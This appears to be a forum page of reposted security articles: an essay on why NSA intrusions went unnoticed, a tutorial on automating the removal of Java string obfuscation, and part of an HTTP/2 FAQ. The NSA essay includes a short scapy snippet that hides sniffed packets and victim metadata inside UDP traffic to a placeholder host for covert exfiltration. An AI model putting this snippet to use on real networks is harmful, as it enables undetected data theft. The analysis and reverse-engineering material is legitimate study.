Everything posted by Nytro

  1. Hey: before making information public, bring evidence as well.
  2. If the NSA has been hacking everything, how has nobody seen them coming? As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have), then how is it that nobody ever spotted them?" The Snowden docs show us that high-value targets have been getting compromised forever, and while the game does heavily favour offence, how is it possible that defence hasn't racked up a single catch? The immediate conclusion for defensive vendors is that they are either ineffective or, worse, wilfully ignorant. However, for buyers of defensive software and gear, questions still remain. The last dump, published by Der Spiegel on the 17th of January, went by pretty quietly (compared to previous releases), but the PDFs released contain a whole bunch of answers that might have slipped by unnoticed. We figured it would probably be worth discussing some of these, because if nothing else they shine a light on areas defenders might previously have been ignoring. (This is especially true if you play at a level where nation-state adversaries form part of your threat model; and, as the leaks show, the NSA targets commercial entities like mobile providers, so it's not just the domain of the spooks.) The purpose of this post isn't to discuss the legality of the NSA's actions or the morality of the leaks; what we are trying to answer is: "Why did we never see it coming?" We think that the following reasons help to explain how this mass exploitation remained under the radar for so long: 1. Amazing adherence to classification/secrecy oaths; 2. You thought they were someone else; 3. You were looking at the wrong level; 4. Some beautiful misdirection; 5. They were playing chess & you were playing checkers; 6. Your "experts" failed you miserably. 1. Amazing adherence to classification/secrecy oaths The air of secrecy surrounding the NSA has been amazingly impressive and, until recently, they had truly earned their nickname of "No Such Agency". A large number of current speakers/trainers/practitioners in infosec have well-acknowledged roots in the NSA. It was clear from their skill-sets and specialities that they were obviously involved with CNE/CNO in their previous lives. If one were to probe deeper, one could make even more guesses as to the scope of their previous activities (and by inference we would have obtained a low-resolution snapshot of NSA activities): for example, Dave Aitel (fuzzing & exploit frameworks), Jamie Butler (rootkits & memory corruption), Charlie Miller (fuzzing & exploitation). Reading through the Snowden documents, a bunch of "new" words has been introduced into our lexicon. "Interdiction" was relatively unheard of, and the word "implant" was almost never used in security circles, but it has now fairly reliably replaced the ageing "rootkit". We have read the documents for a few hours and have adopted these words, but ex-NSA'ers have clearly lived with them for the years of their service. That the choice of wording has not bled far beyond the borders at Fort Meade is interesting and notable.
This amazing adherence to classification and secrecy deserves admiration, and it has likely helped the NSA keep some of its secrets to date. (This is to be expected: when innovation occurs out of sight, terminology diverges. When GCHQ cryptographers conceived early public-key crypto they called it "non-secret cryptography", but this was only revealed many years after "public-key" had become commonplace. Now that "implant" is in the public domain (and is associated with the NSA), there seems little reason for vendors to continue with "rootkit".) 2. You thought they were someone else Skilled adversaries operating under cover of a rioting mob is hardly a new tactic, and when one considers how much "bot"-related activity is seen on the Internet, hiding amongst it is an obviously useful technique. The dump highlights two simple examples of the NSA leveraging this technique. In "4th party collection" we essentially have the NSA either passively or actively stealing intelligence from other intelligence agencies performing CNE. The fact that foreign CNE can be parasitically leeched, actively ransacked or silently repurposed means that even attacks that use malware belonging to country X, with TTPs that strongly point to country X, could be activity that should really be attributed to the 4th-party-collection program. Of course there's no need for the NSA to limit themselves to foreign intelligence agencies. Through DEFIANTWARRIOR you see them making active use of general-purpose botnets too. Along with some details on how botnet hijacking works (sometimes in coordination with the FBI), their slides also offer telling advice on how to make use of this channel. This raises two interesting points that are worth pondering. The first (obvious) one is that even regular cybercrime botnet activity could be masking a more comprehensive form of penetration, and the second is how much muddier it makes the waters of attribution. For the past few years, a great deal has been made of how Chinese IPs have been hacking the Western world. When one considers that the same slide deck made it clear that China had by far the greatest percentage of botnets, we are forced to be more cautious when attributing attacks to China just because they originated from Chinese IPs. (We discussed our views on weakly evidenced China attribution previously [here] & [here].) 3. You were looking at the wrong level A common criticism of the top-tier security conferences is that they focus on attacks that are overly complex, while networks are still being compromised through unpatched servers and shared passwords. What the ANT catalogue and some of the leaks revealed is that sensitive networks have more than enough reason to fear complex attacks too. One of the most interesting documents in this regard appears to be taken from an internal wiki cataloguing ongoing projects (with calls for intern development assistance). The document starts off strong, and continues to deliver: "TAO/ATO Persistence POLITERAIN (CNA) team is looking for interns who want to break things. We are tasked to remotely degrade or destroy opponent computers, routers, servers and network enabled devices by attacking the hardware using low level programming." For most security teams, low-level programming generally means shellcode and OS-level attacks. A smaller subset of researchers will then aim at attacks targeting the kernel.
What we see here is a concerted effort to aim "lower": "We are also always open for ideas but our focus is on firmware, BIOS, BUS or driver level attacks." The rest of the document goes on to mention projects like: "we have discovered a way that may be able to remotely brick network cards... develop a deployable tool"; "erase the BIOS on a brand of servers that act as a backbone to many rival governments"; "create ARM-based SSD implants."; "covert storage product that is enabled from a hard drive firmware modification"; "create a firmware implant that has the ability to pass to and from an implant running in the OS"; "implants for the newest SEAGATE drives..", "for ARM-based Hitachi drives", "for ARM-based Fujitsu drives", "ARM-Samsung drives"; "capability to install a hard drive implant on a USB drive"; "pre-boot persistence.. of OSX"; "EFI module.."; "BERSERKR is a persistent backdoor that is implanted into the BIOS and runs from SMM". All of this perfectly aligns with the CNO/GENIE document, which makes it clear that base resources in that project "will allow endpoint implants to persist in target computers/servers through technology upgrades, and enable the development of new methodologies to persist and maintain presence within hard target networks". We have worked with a few companies who make religious use of whitelisting technologies and have dealt with some who would quickly discover altered system files on sensitive servers. We know a tinier subset of those who would verify the integrity of running hosts using offline examination, but organizations that are able to deal with implanted firmware or subverted BIOSes are few and far between. In the absence of hardware-based TPMs, this is currently a research-grade problem that most people don't even know they have. 4. Some beautiful misdirection Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun". A common IR process when an attack has been discovered is to determine where the exfiltrated data is going. In the most simplistic case (or if big-budget movies are involved) this simple step could allow an analyst to say: "The data from this compromised host is going to HOST_B in country X, so country X is the culprit." Of course, since even spirited teenagers have been making use of "jump hosts" since the '90s, a variation on this would be to base the attribution not just on the location of HOST_B, but on observing who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary".) Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme: an entire new protocol, called FASHIONCLEFT, used to copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network. Tunnelling one type of traffic over another is not novel (although a 27-page interface control document for the protocol is cool), but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in. This is beautiful! The data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector.
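For flavour, the "packet inside a packet, read off the wire in transit" idea is simple enough to sketch. The snippet below is purely our own illustration (it is not FASHIONCLEFT; the marker, framing and addresses are invented), using Python's scapy to wrap a captured packet, plus metadata, inside innocuous-looking UDP that only needs to pass a tap on its way to an arbitrary destination:

from scapy.all import IP, UDP, Raw, raw, send, sniff

DECOY_DST = "203.0.113.10"   # placeholder: the host the packet is addressed to
MAGIC = b"XFIL"              # placeholder marker a passive tap would look for

def exfil(inner_packet, metadata: bytes) -> None:
    # A copy of a victim packet plus metadata, hidden inside ordinary UDP.
    # The addressee never matters: a passive collector on any link the
    # packet crosses peels out the payload as it flies past.
    payload = MAGIC + len(metadata).to_bytes(2, "big") + metadata + raw(inner_packet)
    send(IP(dst=DECOY_DST) / UDP(sport=53, dport=53) / Raw(load=payload))

# e.g. exfil(sniff(count=1)[0], b"victim=10.0.0.5")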
All of this means that we can't rely on the host the data was sent to for attribution, and even if we did completely own the last hop to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network three hops ago. This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet (in their own words), good luck ever finding that smoking gun! 5. They were playing chess & you were playing checkers What's very clear from the breadth of the information is just how out of their depth so many of the other players at this table are. Many are hilariously outgunned, playing on a field that has already been prepared, using tools that have already been rigged... and what's worse is that many of them don't even know this. In 2010, we gave a presentation at the CCDCOE in Estonia to NATO folks. Our talk was titled "Cyberwar - Why your threat model is probably wrong!" (The talk has held up relatively well against the revelations, and is worth a quick read, even though it predated the discovery of STUXNET.) One of the key takeaways from the talk (aside from the fact that any expert who referred to DDoS attacks when talking about cyberwar should be taken with a pinch of salt) was that real attackers build toolchains. Using examples from our pen-testing past, we pointed out how most of the tools we built went into modular toolchains. We mentioned that, more than anything else, robust toolchains were the mark of a "determined, sponsored adversary". Our conclusions from the talk were relatively simple: the nature of the game still heavily favours offence, and attacker toolchains were likely much more complex than the "sophisticated attacks" we had seen to date. When you look at the Snowden documents, if there is one word they scream, it's toolchains; if there are two words, it's "sophisticated toolchains". The USA (and their Five Eyes partners) were clearly way ahead of the curve in spotting the usefulness of the Internet for tradecraft and, true to the motto of U.S. Cyber Command, have been expending resources to ensure "global network dominance". While organizations all over the world have struggled over the past few years to stand up SOCs (security operations centers) to act as central points for the detection and triage of attacks, the documents introduce us (for the first time) to its mirror image, in the form of a ROC. From [media-35654.pdf]: in terms of ROC capacity, the documents show us that in 2005 the ROC was 215 people strong, running a hundred active campaigns per day - in 2005! (That's generations ago in Internet years.) In an op-ed piece we penned for Al Jazeera in 2011, we mentioned that nation states following the headlines about the US training tons of cyber warriors (with the CEH certification, of all things) would be gravely mistaken: offensive capability had been brought to bear on nation states long before the official launch of US Cybercom, and these docs validate those words. In fact, if you are a nation state dipping your toes in these waters, it's worth considering the documented budgets for project GENIE, which we mentioned earlier. With an admittedly ambitious stated goal to "plan, equip and conduct Endpoint operations that actively compromise otherwise intractable targets", we can guess that project GENIE would cost a bit.
Fortunately, we don't have to guess, and can see that in 2011, GENIE alone cost $615MM, with a combined headcount of about 1500 people. JUST. FOR. PROJECT. GENIE. Of course, while debate rages about the morality of governments buying 0days (and while some may think this is a new concept), the same document shows that back in 2012, about $25MM was set aside for "community investment" & "covert purchases of software vulnerabilities". $25MM buys a whole lot of 3rd-party 0day. The possibly asymmetric nature of cyberwar means that small players may be able to punch above their weight class. What we see here is proof positive that the biggest kid in the room has been working on their punching for a long time... 6. Your "experts" failed you miserably The Snowden leaks crossed over from infosec circles into the global zeitgeist, which meant international headlines and sound bites on CNN. This in turn has led to a sharp rise in the number of "CyberWar Experts" happy to trot out their opinions in exchange for their 15 minutes of fame. VC funding is rushing to the sector, and every day we see more silver bullets and more experts show up... but it would behoove us to pause for a bit to examine the track records of these "experts". How did they hold up against yesterday's headlines? I have seen six-figure consultants trying to convince governments that 0days are never used, and have seen people talk of nation-state hacking with nothing more than skinned Metasploit consoles and modern versions of Back Orifice. How many of the global "threat intelligence" companies are highlighting TTPs actually in use by apex predators (instead of merely spotting low-hanging fruit)? If they are not, then we need to conclude that they are either uninformed or complicit in deluding us, and either option should cap the exorbitant fees many currently seek. Conclusion? The leaks give us an insight into the workings of a well-refined offensive machine. The latest files show us why attributing attacks to the NSA will be difficult for a long time to come, and why being "safe from nation state adversaries" requires a great deal more work, by people who are qualified to do so. If nothing else, the leaks reiterate the title of our 2010 talk: "Cyberwar.. why your threat model is probably wrong". [if you enjoy this update, you really should subscribe to ThinkstScapes] Sursa: http://blog.thinkst.com/p/if-nsa-has-been-hacking-everything-how.html
  3. Automating Removal of Java Obfuscation By David Klein, 16 Feb. 2015 In this post we detail a method to improve analysis of Java code for a particular obfuscator; we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker: once the method is understood, a methodology can be developed to automate the process. Introduction Obfuscation is the process of hiding application logic during compilation so that the logic of an application is difficult to follow. The reason for obfuscation is usually vendors attempting to protect intellectual property, but it serves a dual purpose in slowing down vulnerability discovery. Obfuscation comes in many shapes and forms; in this post we focus on a particular subset: string obfuscation, more specifically encrypted string constants. Strings within an application are very useful for understanding its logic; for example, logging strings and exception handling are an excellent window into how an application handles certain state and can greatly speed up efforts to understand functionality. For more information on what obfuscation is within the context of Java, see [0]. Note that the following entry assumes the reader has a rudimentary understanding of programming. Decompilation Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows-based GUI tool that decompiles Java ".class" files); this is done by drag-dropping the target jar into the GUI window. The following is what is shown after scrolling down to an interesting-looking class: Figure 1 - JD-GUI showing the output from the disassembly The first observation we can make is that JD-GUI has not successfully decompiled the class file entirely. The obfuscator has performed some intentional modifications to the bytecode which have hampered decompilation. If we follow the sequence of events in the first z function, we can see that it does not flow correctly: incorrect variables are used where they shouldn't be, and a non-existent variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below. Figure 2 - Showing the suspicious second 'z' function Abandoning JD-GUI and picking up trusty JAD [2] (a command-line Java .class decompiler) yields better results, but still not perfect ones: Figure 3 - Showing the output that JAD generates We can see where decompilation has failed, as JAD inserts raw JVM instructions (as opposed to high-level Java source); in fact JAD tells us as much in its command-line output. Fortunately, it appears that the decoding failures only exist in a consistent but limited set of functions and not in the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as its input. As shown in Figure 2, there are two functions sharing the name z; this is allowed in object-oriented languages (function overloading [3]) and it is common for obfuscators to exploit such functionality. It is, however, possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides a String as the parameter, we can derive the true order and better understand its functionality.
We can see in Figure 4 (below) that the first z converts the input string 's' to a character array: if the length of the array is 1, it performs a bitwise XOR with 0x4D; otherwise it returns the char array as-is. JAD was unable to correctly decompile the function, but in this case such a simple function is easy to analyse. Figure 4 - Showing the first 'z' function The second z function (seen in Figure 5 below) appears to be where the actual decryption is done. Figure 5 - Second 'z' function, highlighting the interesting integer values To understand what happens with the input we must remember that the JVM is stack based: operands are pushed onto the stack and operated upon when popped. The first important instruction we see sets the variable i to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (in fact, ac is pushed onto the stack at the very start of the function). Next, there is a switch statement, which determines the value of byte0. After the switch statement, byte0 is pushed onto the stack. For the first iteration, its value will be 0x51. The operations that follow perform a bitwise XOR between the byte0 value and the character in ac at index i. Then i is incremented and compared with the length of ac: if the index has reached the length of ac, the ac array is converted to a string and returned; if the index is less than the length of ac, the code jumps back to L3 and performs another iteration on the next index. In summary, this z function takes the input and loops over it, taking the character at the current index and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulo-5 operation applied to the current index, indicating that there are 5 possible keys (shown in red in Figure 5). To neaten this up, we will convert the second z to pseudocode: keys = [81,54,2,113,77] // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" input = [ 0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45 ] for i in 0..input.length-1 do printf "%c" (keys[i % keys.length] ^ input[i]) As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within the input string; we have replaced the switch with an index into the keys array. The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption. Problem analysis With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails, because each class file within the Java archive uses a different XOR key. To decrypt the strings en masse, a different approach is required. Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the decompilation using JAD, and then write a script to extract the switch table - which holds the XOR key - and the strings using regexes. This would be reasonably simple but error-prone, and regex just does not seem like an elegant solution.
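Each class file carries its own key material, but the decryption core is identical; only the five key bytes change. As a sanity check, the pseudocode above translates directly into runnable Python (the key bytes and ciphertext are the ones from the example; the script itself is our own sketch):

# XOR keys recovered from the tableswitch in the second 'z' function.
keys = [0x51, 0x36, 0x02, 0x71, 0x4D]   # decimal: 81, 54, 2, 113, 77

# The encrypted string constant from the class file.
ciphertext = [
    0x23, 0x53, 0x71, 0x1E, 0x38, 0x23, 0x55, 0x67, 0x02, 0x62,
    0x22, 0x4F, 0x71, 0x05, 0x28, 0x3C, 0x18, 0x72, 0x03, 0x22,
    0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45,
]

# Key selection is index modulo 5, exactly as in the bytecode.
plaintext = "".join(chr(keys[i % len(keys)] ^ c) for i, c in enumerate(ciphertext))
print(plaintext)  # prints: resources/system.properties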
An alternative approach is to write our own Java decompiler, which gives us a nice abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution, and it is the option we chose. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult. Parsing the class file - overview First we parse the class file format, extracting the constant pool, fields, interfaces, classes and methods. We then disassemble the method bodies (mapping instructions to a set of opcodes); the resulting disassembly looks like the below (snippet): Figure 6 - Showing the byte-to-opcode translation; each section is divided into a grouping (e.g. Constants, Loads, Maths, Stack), an operation (e.g. bipush) and an optional argument (instruction dependent, such as '77'). As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data. Extracting the encryption function We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see from the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect. Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in: As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in the screenshot) is the padding, which we discard. Our algorithm for extracting this table is as follows: detect if a control section contains a tableswitch; extract the tableswitch; extract the jumps from the tableswitch; build a new jump table containing the original jump table with the default jump case appended on the end (we now have all the jumps to the keys); map over the method body and resolve the jumps to values. We now have all the key values and the name of the XOR function. Figure 7 - Code (F#) showing the pattern-matching function which implements the algorithm to extract switch tables. Figure 8 - Showing the resulting extracted XOR keys from the switch table. The next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variables. Extracting the static initialization section is trivial: we map over the code body and find sections where the name is `<clinit>' [9] and the descriptor is `()V', which denotes a method with no parameters that returns void [10]. Once we have extracted this, we resolve the 'private static' values, making sure to only select the values where our decryption function is being called (we know the name of the function, as we saved it). It is now just a process of resolving the strings within the constant pool. At this stage we have: the extracted decryption key; the actual decryption algorithm implemented (XOR); and the encrypted strings.
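Putting those three pieces together, the patching step itself is small. The sketch below is our own illustration of the idea, not the article's code (the real tool works over its parsed constant pool; here we patch raw class-file bytes and assume that offset, the position of a CONSTANT_Utf8 entry's tag byte, has already been located):

import struct

def patch_utf8_constant(class_bytes: bytes, offset: int, keys: list) -> bytes:
    """Decrypt one CONSTANT_Utf8 entry in place: tag byte (0x01),
    two-byte big-endian length, then the encrypted bytes themselves."""
    assert class_bytes[offset] == 0x01, "not a CONSTANT_Utf8 entry"
    (length,) = struct.unpack_from(">H", class_bytes, offset + 1)
    start = offset + 3
    cipher = class_bytes[start:start + length]
    plain = bytes(keys[i % len(keys)] ^ c for i, c in enumerate(cipher))
    # XOR preserves the length, so the rest of the pool needs no fix-ups.
    return class_bytes[:start] + plain + class_bytes[start + length:]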
We can now decrypt the strings and replace the respective constant pool entries with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting unrelated parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions. Figure 9 - Example decryption: plaintext bytes, cipher bytes, and plaintext result. The particular class file we chose to look at turned out not to have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities - but that is a story for another day. Conclusion In conclusion, we have shown that by investing time into our reversing we are able to have higher confidence in the functionality of the target application, and by automating the recovery of obfuscated code we have shown that obfuscation alone is not an adequate protection mechanism, though it does slow an attacker down. In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool. Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge. [0] Protect Your Java Code - Through Obfuscators and Beyond [1] Java Decompiler [2] 404 Not Found [3] Function overloading - Wikipedia, the free encyclopedia [4] https://github.com/Storyyeller/Krakatau [5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html [6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html [7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch [8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html [9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit [10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv Sursa: http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/
  4. HTTP/2 Frequently Asked Questions These are Frequently Asked Questions about HTTP/2. General Questions: Why revise HTTP? Who made HTTP/2? What's the relationship with SPDY? Is it HTTP/2.0 or HTTP/2? What are the key differences to HTTP/1.x? Why is HTTP/2 binary? Why is HTTP/2 multiplexed? Why just one TCP connection? What's the benefit of Server Push? Why do we need header compression? Why HPACK? Can HTTP/2 make cookies (or other headers) better? What about non-browser users of HTTP? Does HTTP/2 require encryption? What does HTTP/2 do to improve security? Can I use HTTP/2 now? Will HTTP/2 replace HTTP/1.x? Will there be a HTTP/3? Implementation Questions: Why the rules around Continuation on HEADERS frames? What is the minimum or maximum HPACK state size? How can I avoid keeping HPACK state? Why is there a single compression/flow-control context? Why is there an EOS symbol in HPACK? Deployment Questions: How do I debug HTTP/2 if it's encrypted? General Questions Why revise HTTP? HTTP/1.1 has served the Web well for more than fifteen years, but its age is starting to show. Loading a Web page is more resource-intensive than ever (see the HTTP Archive's page size statistics), and loading all of those assets efficiently is difficult, because HTTP practically only allows one outstanding request per TCP connection. In the past, browsers have used multiple TCP connections to issue parallel requests. However, there are limits to this; if too many connections are used, it's both counter-productive (TCP congestion control is effectively negated, leading to congestion events that hurt performance and the network) and fundamentally unfair (because browsers are taking more than their share of network resources). At the same time, the large number of requests means a lot of duplicated data "on the wire". Both of these factors mean that HTTP/1.1 requests have a lot of overhead associated with them; if too many requests are made, it hurts performance. This has led the industry to a place where it's considered Best Practice to do things like spriting, data: inlining, domain sharding and concatenation. These hacks are indications of underlying problems in the protocol itself, and cause a number of problems on their own when used. Who made HTTP/2? HTTP/2 was developed by the IETF's HTTP Working Group, which maintains the HTTP protocol. It's made up of a number of HTTP implementers, users, network operators and HTTP experts. Note that while our mailing list is hosted on the W3C site, this is not a W3C effort. Tim Berners-Lee and the W3C TAG are kept up-to-date with the WG's progress, however. A large number of people have contributed to the effort, but the most active participants include engineers from "big" projects like Firefox, Chrome, Twitter, Microsoft's HTTP stack, Curl and Akamai, as well as a number of HTTP implementers in languages like Python, Ruby and NodeJS. To learn more about participating in the IETF, see the Tao of the IETF; you can also get a sense of who's contributing to the specification on Github's contributor graph, and who's implementing on our implementation list. What's the relationship with SPDY? HTTP/2 was first discussed when it became apparent that SPDY was gaining traction with implementers (like Mozilla and nginx), and was showing significant improvements over HTTP/1.x. After a call for proposals and a selection process, SPDY/2 was chosen as the basis for HTTP/2.
Since then, there have been a number of changes, based on discussion in the Working Group and feedback from implementers. Throughout the process, the core developers of SPDY have been involved in the development of HTTP/2, including both Mike Belshe and Roberto Peon. In February 2015, Google announced its plans to remove support for SPDY in favor of HTTP/2. Is it HTTP/2.0 or HTTP/2? The Working Group decided to drop the minor version (".0") because it has caused a lot of confusion in HTTP/1.x. In other words, the HTTP version only indicates wire compatibility, not feature sets or "marketing". What are the key differences to HTTP/1.x? At a high level, HTTP/2: is binary, instead of textual; is fully multiplexed, instead of ordered and blocking; can therefore use one connection for parallelism; uses header compression to reduce overhead; allows servers to "push" responses proactively into client caches. Why is HTTP/2 binary? Binary protocols are more efficient to parse, more compact "on the wire", and, most importantly, much less error-prone compared to textual protocols like HTTP/1.x, because textual protocols need a number of affordances to "help" with things like whitespace handling, capitalization, line endings, blank lines and so on. For example, HTTP/1.1 defines four different ways to parse a message; in HTTP/2, there's just one code path. It's true that HTTP/2 isn't usable through telnet, but we already have some tool support, such as a Wireshark plugin. Why is HTTP/2 multiplexed? HTTP/1.x has a problem called "head-of-line blocking," where effectively only one request can be outstanding on a connection at a time. HTTP/1.1 tried to fix this with pipelining, but it didn't completely address the problem (a large or slow response can still block others behind it). Additionally, pipelining has been found very difficult to deploy, because many intermediaries and servers don't process it correctly. This forces clients to use a number of heuristics (often guessing) to determine what requests to put on which connection to the origin when; since it's common for a page to load 10 times (or more) the number of available connections, this can severely impact performance, often resulting in a "waterfall" of blocked requests. Multiplexing addresses these problems by allowing multiple request and response messages to be in flight at the same time; it's even possible to intermingle parts of one message with another on the wire. This, in turn, allows a client to use just one connection per origin to load a page. Why just one TCP connection? With HTTP/1, browsers open between four and eight connections per origin. Since many sites use multiple origins, this could mean that a single page load opens more than thirty connections. One application opening so many connections simultaneously breaks a lot of the assumptions that TCP was built upon; since each connection will start a flood of data in the response, there's a real risk that buffers in the intervening network will overflow, causing a congestion event and retransmits. Additionally, using so many connections unfairly monopolizes network resources, "stealing" them from other, better-behaved applications (e.g., VoIP). What's the benefit of Server Push? When a browser requests a page, the server sends the HTML in the response, and then needs to wait for the browser to parse the HTML and issue requests for all of the embedded assets before it can start sending the JavaScript, images and CSS.
Server Push allows the server to avoid this round trip of delay by "pushing" the responses it thinks the client will need into its cache. Why do we need header compression? Patrick McManus from Mozilla showed this vividly by calculating the effect of headers for an average page load. If you assume that a page has about 80 assets (which is conservative in today's Web), and each request has 1400 bytes of headers (again, not uncommon, thanks to Cookies, Referer, etc.), it takes at least 7-8 round trips just to get the headers out "on the wire." That's not counting response time - that's just to get them out of the client. This is because of TCP's Slow Start mechanism, which paces packets out on new connections based on how many packets have been acknowledged - effectively limiting the number of packets that can be sent for the first few round trips. In comparison, even mild compression on headers allows those requests to get onto the wire within one round trip - perhaps even one packet. This overhead is considerable, especially when you consider the impact upon mobile clients, which typically see round-trip latency of several hundred milliseconds, even under good conditions. Why HPACK? SPDY/2 proposed using a single GZIP context in each direction for header compression, which was simple to implement as well as efficient. Since then, a major attack has been documented against the use of stream compression (like GZIP) inside of encryption: CRIME. With CRIME, it's possible for an attacker who has the ability to inject data into the encrypted stream to "probe" the plaintext and recover it. Since this is the Web, JavaScript makes this possible, and there were demonstrations of recovery of cookies and authentication tokens using CRIME for TLS-protected HTTP resources. As a result, we could not use GZIP compression. Finding no other algorithms that were suitable for this use case as well as safe to use, we created a new, header-specific compression scheme that operates at a coarse granularity; since HTTP headers often don't change between messages, this still gives reasonable compression efficiency, and is much safer. Can HTTP/2 make cookies (or other headers) better? This effort was chartered to work on a revision of the wire protocol - i.e., how HTTP headers, methods, etc. are put "onto the wire" - not to change HTTP's semantics. That's because HTTP is so widely used. If we used this version of HTTP to introduce a new state mechanism (one example that's been discussed) or change the core methods (thankfully, this hasn't yet been proposed), it would mean that the new protocol was incompatible with the existing Web. In particular, we want to be able to translate from HTTP/1 to HTTP/2 and back with no loss of information. If we started "cleaning up" the headers (and most will agree that HTTP headers are pretty messy), we'd have interoperability problems with much of the existing Web. Doing that would just create friction against the adoption of the new protocol. All of that said, the HTTP Working Group is responsible for all of HTTP, not just HTTP/2. As such, we can work on new mechanisms that are version-independent, as long as they're backwards-compatible with the existing Web. What about non-browser users of HTTP? Non-browser applications should be able to use HTTP/2 as well, if they're already using HTTP. Early feedback has been that HTTP/2 has good performance characteristics for HTTP "APIs", because the APIs don't need to consider things like request overhead in their design.
Having said that, the main focus of the improvements we're considering is the typical browsing use cases, since this is the core use case for the protocol. Our charter says this about it: The resulting specification(s) are expected to meet these goals for common existing deployments of HTTP; in particular, Web browsing (desktop and mobile), non-browsers ("HTTP APIs"), Web serving (at a variety of scales), and intermediation (by proxies, corporate firewalls, "reverse" proxies and Content Delivery Networks). Likewise, current and future semantic extensions to HTTP/1.x (e.g., headers, methods, status codes, cache directives) should be supported in the new protocol. Note that this does not include uses of HTTP where non-specified behaviours are relied upon (e.g., connection state such as timeouts or client affinity, and "interception" proxies); these uses may or may not be enabled by the final product. Does HTTP/2 require encryption? No. After extensive discussion, the Working Group did not have consensus to require the use of encryption (e.g., TLS) for the new protocol. However, some implementations have stated that they will only support HTTP/2 when it is used over an encrypted connection. What does HTTP/2 do to improve security? HTTP/2 defines a profile of TLS that is required; this includes the version, a ciphersuite blacklist, and the extensions used. See the spec for details. There is also discussion of additional mechanisms, such as using TLS for http:// URLs (so-called "opportunistic encryption"); see the relevant draft. Can I use HTTP/2 now? HTTP/2 is currently available in Firefox and Chrome for testing, using the "h2-14" protocol identifier. There are also several servers available (including a test server from Akamai, plus Google's and Twitter's main sites), and a number of Open Source implementations that you can deploy and test. See the implementations list for more details. Will HTTP/2 replace HTTP/1.x? The goal of the Working Group is that typical uses of HTTP/1.x can use HTTP/2 and see some benefit. Having said that, we can't force the world to migrate, and because of the way that people deploy proxies and servers, HTTP/1.x is likely to still be in use for quite some time. Will there be a HTTP/3? If the negotiation mechanism introduced by HTTP/2 works well, it should be possible to support new versions of HTTP much more easily than in the past. Implementation Questions Why the rules around Continuation on HEADERS frames? Continuation exists since a single value (e.g. Set-Cookie) could exceed 16KiB - 1, which means it couldn't fit into a single frame. It was decided that the least error-prone way to deal with this was to require that all of the headers data come in back-to-back frames, which makes decoding and buffer management easier. What is the minimum or maximum HPACK state size? The receiver always controls the amount of memory used in HPACK, and can set it to zero at a minimum, with a maximum related to the maximum representable integer in a SETTINGS frame, currently 2^32 - 1. How can I avoid keeping HPACK state? Send a SETTINGS frame setting the state size (SETTINGS_HEADER_TABLE_SIZE) to zero, then RST all streams until a SETTINGS frame with the ACK bit set has been received (a sketch of such a frame is shown below). Why is there a single compression/flow-control 